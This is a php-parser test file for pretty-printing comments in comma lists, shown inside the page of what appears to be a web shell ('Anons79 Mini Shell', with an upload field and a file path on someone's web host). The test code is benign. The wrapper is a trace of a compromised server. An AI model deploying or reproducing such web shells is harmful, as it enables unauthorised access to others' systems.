Anons79 Mini Shell

Directory : /home/proudlyafrican/www/vendor/nikic/php-parser/test/code/prettyPrinter/
Upload File :
Current File : /home/proudlyafrican/www/vendor/nikic/php-parser/test/code/prettyPrinter/commentsInCommaList.test

Comments in arrays and function calls
-----
<?php

$arr = [
    // Foo
    $foo,
    // Bar
    $bar,
    // Discarded
];
[
    // Foo
    $foo,
    ,
    // Bar
    $bar,
] = $arr;
foo(
    // Foo
    $foo,
    // Bar
    $bar
);
new Foo(
    // Foo
    $foo
);
-----
!!php7
$arr = [
    // Foo
    $foo,
    // Bar
    $bar,
];
[
    // Foo
    $foo,
    ,
    // Bar
    $bar,
] = $arr;
foo(
    // Foo
    $foo,
    // Bar
    $bar
);
new Foo(
    // Foo
    $foo
);

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]